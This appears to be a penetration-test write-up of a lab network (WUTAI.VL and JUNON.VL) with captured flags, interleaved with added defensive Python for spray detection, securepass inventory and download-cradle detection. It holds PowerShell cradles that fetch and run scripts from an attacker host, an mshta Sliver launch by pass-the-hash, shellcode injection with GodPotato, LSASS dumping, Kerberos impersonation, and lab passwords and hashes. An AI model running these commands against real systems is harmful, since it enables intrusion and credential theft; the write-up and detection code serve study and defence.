Executive Summary
Our task is to perform an external black-box penetration test of WUTAI.VL, which also has a subsidiary, JUNON.VL. There was a recent secret leak on Pastebin; it can be accessed at https://pastebin.com/BBZkJGU1 with the password KE37vTed5S.
The goal of this engagement is to reach Enterprise Administrator in WUTAI.VL.
Key Findings
Attack Flow and Narrative
Detailed Findings
The external IP range is 172.16.20.0/24. After scanning the whole range we found two reachable hosts.
| Machine Name | IP |
|---|---|
| | 172.16.20.50 |
| | 172.16.20.100 |
We found a list of users from work.junon.vl on the Pastebin paste.
We first created a password list (generate_passwords.py) to use for brute-forcing the discovered users.

172.16.20.50
sudo nmap -sC -sV -T4 -p- -oA 172.16.20.50 172.16.20.50 -vvv
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 |
| 8080 | http-proxy | Squid http proxy 5.2 |
- Runs a Squid proxy on port 8080.
- We can try connecting through this proxy to see whether its configuration allows us to reach the internal network.

proxychains -f /etc/proxychains4.conf cme smb 172.16.20.0/24 2>/dev/null
proxychains -f /etc/proxychains4.conf cme ssh 172.16.20.0/24 2>/dev/null

proxychains -f /etc/proxychains4.conf cme smb 172.16.21.0/24 2>/dev/null
proxychains -f /etc/proxychains4.conf cme ssh 172.16.21.0/24 2>/dev/null
proxychains -f /etc/proxychains4.conf cme smb 172.16.19.0/24 2>/dev/null
After brute-forcing we found the following valid User:Password pairs.
| Username | Password |
|---|---|
| Wendy.Vincent | Summer2023 |
| Hazel.Simpson | Summer2023 |
| Terry.Lowe | Summer2023 |
| Melanie.Mueller | Summer2023 |
| Jade.Watson | Winter2022 |
| Hollie.Parker | Winter2022 |
| Sarah.Allen | Wutai2023 |
| Tom.Perkings | Wutai2023 |
| Roger.Ball | Junon2023 |
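The credentials above were recovered by spraying a short list of seasonal and company-name passwords against the leaked user list. The following Python is an added example (not part of these engagement notes) of what the defending side can do with that pattern: a sliding-window spray detector over authentication events, which flags a source that fails against many distinct accounts in a short span and lists any success from the same source, plus a banned-password check for the Season+Year and OrgName+Year shapes that worked here. The log format, the source IPs and the org-name list are constructed assumptions for this example; the usernames are taken from the table above.

```python
"""Password-spray detection over authentication logs (added example).

The log format ("timestamp src user result"), the log lines and the
org-name list below are constructed for this example; real products log
differently, so only the parse_line() function needs to change.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 203.0.113.7 sprays several accounts and then lands one;
# 198.51.100.9 is a single user mistyping a password twice (must not alert).
SAMPLE_LOG = """\
2024-07-24T09:00:01Z 203.0.113.7 Wendy.Vincent FAIL
2024-07-24T09:00:02Z 203.0.113.7 Hazel.Simpson FAIL
2024-07-24T09:00:03Z 203.0.113.7 Terry.Lowe FAIL
2024-07-24T09:00:04Z 203.0.113.7 Jade.Watson FAIL
2024-07-24T09:00:05Z 203.0.113.7 Sarah.Allen FAIL
2024-07-24T09:00:06Z 203.0.113.7 Roger.Ball SUCCESS
2024-07-24T09:00:07Z 198.51.100.9 Hollie.Parker FAIL
2024-07-24T09:00:30Z 198.51.100.9 Hollie.Parker FAIL
2024-07-24T09:01:00Z 198.51.100.9 Hollie.Parker SUCCESS
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (SUCCESS|FAIL)$")
SEASONS = {"spring", "summer", "autumn", "fall", "winter"}


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it is malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ"),
        "src": m.group(2),
        "user": m.group(3).lower(),  # normalise case: Wendy.Vincent == wendy.vincent
        "ok": m.group(4) == "SUCCESS",
    }


def detect_spray(lines, window=timedelta(minutes=10), min_users=5):
    """Return {src: {"sprayed_users": [...], "successes": [...]}} for every
    source whose failed logins cover at least min_users distinct accounts
    inside any span of length `window`."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["ts"])
    failures = defaultdict(list)
    successes = defaultdict(set)
    for e in events:
        if e["ok"]:
            successes[e["src"]].add(e["user"])
        else:
            failures[e["src"]].append(e)

    alerts = {}
    for src, evs in failures.items():
        start = 0
        for end in range(len(evs)):
            # shrink the window from the left until the span fits
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in evs[start:end + 1]}
            if len(users) >= min_users:
                alerts[src] = {
                    "sprayed_users": sorted(users),
                    # a success from a spraying source is the part worth paging on
                    "successes": sorted(successes.get(src, set())),
                }
                break
    return alerts


def is_guessable_password(pw, org_names=("wutai", "junon")):
    """True for Season+Year or OrgName+Year (2- or 4-digit year, optional
    trailing symbols), the shapes the spray above succeeded with. Suitable
    as a banned-password rule; org_names is an assumed list for this example."""
    m = re.fullmatch(r"([A-Za-z]+)(\d{2}|\d{4})[!@#$%]*", pw)
    if not m:
        return False
    word = m.group(1).lower()
    return word in SEASONS or word in {n.lower() for n in org_names}


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_LOG.splitlines()).items():
        print(f"spray from {src}: {len(info['sprayed_users'])} accounts, successes={info['successes']}")
```

Tune `window` and `min_users` to the environment's normal failure rate; the check deliberately keys on distinct accounts per source rather than on failure count, because a spray keeps every account under the lockout threshold.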
172.16.20.100
sudo nmap -sC -sV -T4 -p- -oA 172.16.20.100 172.16.20.100 -vvv
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 |
| 443 | ssl/http | nginx |
- Runs Kasm on port 443, which lets us connect to a virtual desktop if we know a valid username and password.
- So I used the credentials of Roger.Ball to access the Kasm virtual desktop.
Work.Junon.VL
172.16.21.240 (s021v010)
- SSH machine
- root 7d3XHR8uTgg2aB
172.16.21.10 (S021M005)
- Domain - work.junon.vl
- Most likely the domain controller, as SMB signing is set to true
| Service |
|---|
| smb |
| winrm |
| rdp |
172.16.21.140 (S021W105)
- Domain - work.junon.vl
| Service |
|---|
| rdp |
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WORK-JUNON
| NetBIOS_Domain_Name: WORK-JUNON
| NetBIOS_Computer_Name: S021W105
| DNS_Domain_Name: work.junon.vl
| DNS_Computer_Name: S021W105.work.junon.vl
| DNS_Tree_Name: work.junon.vl
| Product_Version: 10.0.19041
|_ System_Time: 2024-07-24T09:15:38+00:00
| ssl-cert: Subject: commonName=S021W105.work.junon.vl
| Not valid before: 2024-02-27T11:03:30
|_Not valid after: 2024-08-28T11:03:30
|_ssl-date: 2024-07-24T09:15:42+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
- From the ManageEngine instance on 172.16.21.195 (S021M015) we can see this machine.

Initial Foothold as SYSTEM
- We open PowerShell or the Command Prompt
(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX
- Ran the above command as SYSTEM and as carly.adams


Flag4.txt: VL{19a947c8712201ea96c9b5666c721094} (submitted)
proxychains -f /etc/proxychains4.conf xfreerdp /u:Carly.Adams /p:ZMskoMXML_qC17 /v:172.16.21.140
- Edge browser
- root 7d3XHR8uTgg2aB


172.16.21.195 (S021M015)
- Domain - work.junon.vl
- SMB signing is set to false
We did share enumeration from 172.16.21.180.
PORT STATE SERVICE REASON
80/tcp open http syn-ack
111/tcp open rpcbind syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
2049/tcp open nfs syn-ack
3389/tcp open ms-wbt-server syn-ack
8080/tcp open http-proxy syn-ack
8083/tcp open us-srv syn-ack
8383/tcp open m2mservices syn-ack
8443/tcp open https-alt syn-ack
| Service |
|---|
| smb |
| winrm |
| rdp |

- Logged in with the admin credentials and the OTP from KeePass

172.16.21.180 (S021M010)
- Domain - work.junon.vl
- SMB signing is set to false
| Service |
|---|
| smb |
| winrm |
Initial Access
Got RDP access to the machine after logging in on 172.16.20.100
iwr http://10.8.0.154/amsi64.txt | IEX

Flag1.txt: VL{f8ac47197978c087b4b882e84fbdc328} (submitted)
Privilege Escalation
upload test.aspx
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')"
upload sharp.ps1
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
ps

flag2.txt: VL{3ee23591eab673b8769fe3b1a75b858a} (submitted)
Post Exploitation / Host Recon
Credential Theft
nanodump 684 test 1 PMDM
download test
python3 -m pypykatz lsa minidump test
Loot
Username: S021M010$
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8d7070b48346d843e63616b99f048929
Administrator:500:aad3b435b51404eeaad3b435b51404ee:748b542e4b5450664592e7d256edc4b5:::
proxychains -f /etc/proxychains4.conf getST.py -self -impersonate "Administrator" -altservice "cifs/S021M010.work.junon.vl" -dc-ip 172.16.21.10 work.junon.vl/'s021m010$' -hashes aad3b435b51404eeaad3b435b51404ee:8d7070b48346d843e63616b99f048929
Host recon
Found config.xml
<?xml version="1.0"?>
<securepass>
<username>svc_me</username>
<password>SP81274145f4a5857b839ee7b500f1d66e8a044d12211781b515e7bae67bb7abce</password>
</securepass>
- Flag in amy.ball's home directory

flag3.txt: VL{3387261d92644002942061cfea267da2} (submitted)
- Reverse-engineered password
Decrypting the securepass file
- See part 3 of the video.
- 8623050922ab890bbd2f79886cd6809f (key)
- 81274145f4a5857b839ee7b500f1d66e (IV)
- 8a044d12211781b515e7bae67bb7abce (pass)

- Password = jYEp9bq32KFLVL!
- Username = svc_me
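As an added example, not part of the original notes: a small parser that inventories securepass entries in a config.xml like the one found above. The key, IV and pass values listed show that the password blob is the literal "SP" followed by the 16-byte IV in hex and then the ciphertext, with the key held elsewhere and static, so every entry protected this way is recoverable by anyone holding that key and should be treated as a plaintext credential for rotation purposes. The field layout is inferred from those values; the parser validates and splits the blob but does not decrypt, because the cipher is not stated here. The sample XML is the file shown above.

```python
"""Inventory "securepass" entries in a ManageEngine-style config.xml (added example).

Layout assumed from the values recovered above: "SP" + 32 hex chars of IV
+ 32*n hex chars of ciphertext. The key is not stored in the file, so this
code only splits the fields; it does not attempt decryption.
"""
import xml.etree.ElementTree as ET

SP_PREFIX = "SP"
IV_HEX_LEN = 32      # 16-byte IV, hex encoded
BLOCK_HEX_LEN = 32   # one 16-byte cipher block, hex encoded

# Copy of the config.xml found on the host (values as shown above).
SAMPLE_CONFIG = """<?xml version="1.0"?>
<securepass>
<username>svc_me</username>
<password>SP81274145f4a5857b839ee7b500f1d66e8a044d12211781b515e7bae67bb7abce</password>
</securepass>
"""


def parse_securepass_blob(blob):
    """Split an SP<iv><ciphertext> blob into {"iv", "ciphertext"} hex strings.
    Raises ValueError for anything that does not fit the assumed layout."""
    if not blob.startswith(SP_PREFIX):
        raise ValueError("missing SP prefix")
    body = blob[len(SP_PREFIX):]
    if len(body) < IV_HEX_LEN + BLOCK_HEX_LEN or (len(body) - IV_HEX_LEN) % BLOCK_HEX_LEN:
        raise ValueError("body is not IV + whole cipher blocks")
    try:
        bytes.fromhex(body)
    except ValueError:
        raise ValueError("body is not hex") from None
    return {"iv": body[:IV_HEX_LEN], "ciphertext": body[IV_HEX_LEN:]}


def find_securepass_entries(xml_text):
    """Return one record per <securepass> element: username, iv, ciphertext and
    'blocks', the number of 16-byte cipher blocks (which bounds the plaintext length)."""
    root = ET.fromstring(xml_text)
    entries = []
    for node in root.iter("securepass"):   # iter() includes the root itself
        user = (node.findtext("username") or "").strip()
        blob = (node.findtext("password") or "").strip()
        fields = parse_securepass_blob(blob)
        entries.append({
            "username": user,
            **fields,
            "blocks": len(fields["ciphertext"]) // BLOCK_HEX_LEN,
        })
    return entries


if __name__ == "__main__":
    for entry in find_securepass_entries(SAMPLE_CONFIG):
        print(f"{entry['username']}: iv={entry['iv']} blocks={entry['blocks']} -> rotate")
```

Run it over every config.xml on the host to get the list of service accounts whose secrets depend on the static key; after rotation, the same parser confirms the old blobs are gone.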

Now we need to find a machine that runs ManageEngine.
EU.JUNON.VL
172.16.21.222 (S021M200)
- Domain - eu.junon.vl
- Most likely the domain controller, as SMB signing is set to true.
| Service |
|---|
| smb |
| winrm |
| rdp |
172.16.21.223 (S021M215)
- Domain - eu.junon.vl
| Service |
|---|
| rdp |
Extra machines
172.16.21.15
- SSH machine
APPENDIX
Resource Development for Sliver C2
- Created sph.exe
- Created sliverphollow64.txt
Getting Shells
cme smb 172.16.225.194 -u 'Administrator' -H f99529e42ee77dc4704c568ba9320a34 --local-auth -x "C:\Windows\System32\mshta.exe http://10.8.0.154/sliver64.hta"
(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX
iwr http://10.8.0.154/amsi64.txt | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.8.0.154:80/amsi64.txt%27)%22
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/amsi64.txt')"
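The commands above, together with the iwr/DownloadString lines used at the foothold, initial-access and privilege-escalation steps, are all one primitive: fetch a script over HTTP and hand it to Invoke-Expression, sometimes URL-encoded because it was submitted through a web request. The following Python is an added example (not the engagement's tooling) of detecting that primitive in PowerShell script-block or process command-line logs: it URL-decodes and normalises each logged command, then requires both a fetch indicator and an execute indicator before reporting a cradle, so a plain download to disk is not flagged. The sample commands are constructed and use documentation IP addresses rather than the engagement's.

```python
"""Download-cradle detection for PowerShell command logs (added example).

Input is a list of logged command strings (script-block text or process
command lines). Sample commands below are constructed for this example.
"""
import re
from urllib.parse import unquote

# Indicators are matched against the normalised (decoded, lowercased) command.
INDICATORS = {
    "webclient_downloadstring": re.compile(r"net\.webclient.*?downloadstring"),
    "invoke_webrequest": re.compile(r"(?:^|[\s(\"'])(?:iwr|invoke-webrequest|curl|wget)\s+https?://"),
    "invoke_expression": re.compile(r"(?:^|[\s|(\"'])(?:iex|invoke-expression)(?:\s|\(|$)"),
    "pipe_to_iex": re.compile(r"\|\s*(?:iex|invoke-expression)\b"),
}
FETCH = {"webclient_downloadstring", "invoke_webrequest"}
EXECUTE = {"invoke_expression", "pipe_to_iex"}
URL_RE = re.compile(r"https?://[^\s'\")]+")

SAMPLE_COMMANDS = [
    "(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/amsi64.txt') | IEX",
    "iwr http://192.0.2.10/amsi64.txt | IEX",
    # same cradle after passing through a web request (percent-encoded)
    "powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://192.0.2.10:80/amsi64.txt%27)%22",
    "Get-ChildItem C:\\Windows\\Tasks | Format-Table",   # benign admin command
]


def normalize(cmd, max_rounds=3):
    """URL-decode repeatedly (bounded, to catch double encoding), then lowercase
    and collapse whitespace so indicator patterns see one canonical form."""
    prev = None
    for _ in range(max_rounds):
        if cmd == prev:
            break
        prev, cmd = cmd, unquote(cmd)
    return re.sub(r"\s+", " ", cmd).strip().lower()


def classify(cmd):
    """Return {"indicators": [...], "urls": [...]} for one command."""
    n = normalize(cmd)
    hits = [name for name, rx in INDICATORS.items() if rx.search(n)]
    return {"indicators": hits, "urls": URL_RE.findall(n)}


def is_download_cradle(cmd):
    """A cradle needs both a fetch and an execute indicator; a bare download
    (e.g. iwr ... -OutFile) or a bare IEX on local text does not qualify."""
    hits = set(classify(cmd)["indicators"])
    return bool(hits & FETCH) and bool(hits & EXECUTE)


def scan(commands):
    """Return the flagged commands with their indicators and remote URLs."""
    return [{"command": c, **classify(c)} for c in commands if is_download_cradle(c)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMANDS):
        print(hit["indicators"], hit["urls"])
```

The URLs pulled out by `scan()` are the useful pivot for response: every host that logged a cradle against the same URL, and the egress records for that address, belong to the same intrusion. Enabling PowerShell script-block logging (Event ID 4104) is what makes the decoded text available in the first place; without it only the process command line is visible.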